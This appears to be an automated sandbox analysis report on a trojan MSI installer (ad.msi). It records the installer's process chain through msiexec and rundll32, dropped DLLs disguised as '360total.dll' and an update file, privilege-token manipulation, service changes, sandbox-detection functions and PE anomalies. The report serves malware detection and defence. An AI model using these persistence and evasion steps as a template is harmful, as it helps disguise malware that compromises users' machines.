Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800630CC	6_2_00000001800630CC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018005912C	6_2_000000018005912C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004B1A4	6_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180049278	6_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018007B2D0	6_2_000000018007B2D0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018002B2EC	6_2_000000018002B2EC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006D3D4	6_2_000000018006D3D4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800033E0	6_2_00000001800033E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180075480	6_2_0000000180075480
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800694A0	6_2_00000001800694A0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018005958C	6_2_000000018005958C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800576DC	6_2_00000001800576DC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800097E0	6_2_00000001800097E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800277FC	6_2_00000001800277FC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018002D964	6_2_000000018002D964
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180073B60	6_2_0000000180073B60
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018007BBB0	6_2_000000018007BBB0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001BC38	6_2_000000018001BC38
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018005DD18	6_2_000000018005DD18
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180073DF0	6_2_0000000180073DF0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180011DF0	6_2_0000000180011DF0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018005BE6C	6_2_000000018005BE6C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004FF88	6_2_000000018004FF88
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000026387CF1030	6_2_0000026387CF1030
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000002095B821030	7_2_000002095B821030
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000002268D6D1030	8_2_000002268D6D1030

Source: C:\Windows\System32\rundll32.exe	Code function: String function: 000000018000CF30 appears 33 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 0000000180005348 appears 71 times
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: String function: 00B5325F appears 103 times
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: String function: 00B53790 appears 39 times
Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: String function: 00B53292 appears 70 times

Source: ad.msi	Binary or memory string: OriginalFilenameviewer.exeF vs ad.msi
Source: ad.msi	Binary or memory string: OriginalFilenameAICustAct.dllF vs ad.msi

Source: classification engine

Classification label: mal88.troj.evad.winMSI@12/30@1/1

Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180049050 GetCurrentProcessId,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,SetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,OpenProcess,	6_2_0000000180049050
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,	6_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z,	6_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018008395A DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,	6_2_000000018008395A

Source: C:\Windows\Installer\MSIB6D3.tmp

Code function: 5_2_00B33860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,FindCloseChangeNotification,Process32NextW,CloseHandle,

5_2_00B33860

Source: C:\Windows\Installer\MSIB6D3.tmp

Code function: 5_2_00B34BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,

5_2_00B34BA0

Source: C:\Windows\Installer\MSIB6D3.tmp

Code function: 5_2_00B345B0 LoadResource,LockResource,SizeofResource,

5_2_00B345B0

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\CMLB691.tmp

Source: C:\Windows\System32\rundll32.exe

Mutant created: \Sessions\1\BaseNamedObjects\runnung

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Local\Temp\MSIB151.tmp

Source: C:\Windows\Installer\MSIB6D3.tmp

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown

Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq

Source: rundll32.exe, rundll32.exe, 00000006.00000003.2111415783.0000026387FC0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000007.00000002.3347746498.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_71a2ec86.dll.6.dr, 360total.dll.2.dr	Binary or memory string: select * from sqlite_sequence;
Source: rundll32.exe, rundll32.exe, 00000006.00000003.2111415783.0000026387FC0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000007.00000002.3347746498.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_71a2ec86.dll.6.dr, 360total.dll.2.dr	Binary or memory string: update sqlite_sequence set seq = 0 where name='MT';

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\ad.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding CFBB24A404B21769C19C85B2027D69FC C
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 02B62BF455D61FC50D15E7A41AF45BC1
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSIB6D3.tmp "C:\Windows\Installer\MSIB6D3.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: unknown	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_71a2ec86.dll", homq
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_71a2ec86.dll", homq
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding CFBB24A404B21769C19C85B2027D69FC C	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 02B62BF455D61FC50D15E7A41AF45BC1	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSIB6D3.tmp "C:\Windows\Installer\MSIB6D3.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_71a2ec86.dll", homq	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msihnd.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\Installer\MSIB6D3.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Installer\MSIB6D3.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Installer\MSIB6D3.tmp	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Installer\MSIB6D3.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Installer\MSIB6D3.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior

Source: C:\Windows\Installer\MSIB6D3.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32

Drops executables to the windows directory (C:\Windows) and starts them

Source: ad.msi

Static file information: File size 1619456 > 1048576

Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSIB6D3.tmp, 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmp, MSIB6D3.tmp, 00000005.00000000.2105755236.0000000000B77000.00000002.00000001.01000000.00000003.sdmp, ad.msi, 62b2e8.msi.2.dr, MSIB616.tmp.2.dr, MSIB6D3.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB539.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB539.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIB6D3.tmp, 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmp, MSIB6D3.tmp, 00000005.00000000.2105755236.0000000000B77000.00000002.00000001.01000000.00000003.sdmp, ad.msi, 62b2e8.msi.2.dr, MSIB616.tmp.2.dr, MSIB6D3.tmp.2.dr
Source:	Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000006.00000003.2111415783.0000026387FC0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000007.00000002.3347746498.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_71a2ec86.dll.6.dr, 360total.dll.2.dr

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError,

6_2_00000001800033E0

Source: Update_71a2ec86.dll.6.dr	Static PE information: real checksum: 0xe14a2 should be: 0xe5e2c
Source: 360total.dll.2.dr	Static PE information: real checksum: 0xe14a2 should be: 0xe5e2c

Source: 360total.dll.2.dr	Static PE information: section name: yhDm^
Source: Update_71a2ec86.dll.6.dr	Static PE information: section name: yhDm^

Source: C:\Windows\Installer\MSIB6D3.tmp	Code function: 5_2_00B5323C push ecx; ret	5_2_00B5324F
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180010451 push rcx; ret	6_2_0000000180010452
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001045A push rcx; ret	6_2_000000018001045B
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018017500F push rdx; iretd	6_2_0000000180175010

Persistence and Installation Behavior

Source: C:\Windows\System32\msiexec.exe

Executable created and started: C:\Windows\Installer\MSIB6D3.tmp

Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSIB151.tmp	Jump to dropped file
Source: C:\Windows\System32\rundll32.exe	File created: :wtfbbq (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSIB1FF.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIB539.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSIB25F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSIB22F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSIB1DF.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIB5A8.tmp	Jump to dropped file
Source: C:\Windows\System32\rundll32.exe	File created: C:\Users\user\AppData\Roaming\Custom_update\Update_71a2ec86.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSIB29F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIB6D3.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\sharepoint\360total.dll	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIB539.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIB5A8.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIB6D3.tmp	Jump to dropped file

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180062148 memset,GetModuleFileNameW,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

6_2_0000000180062148

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
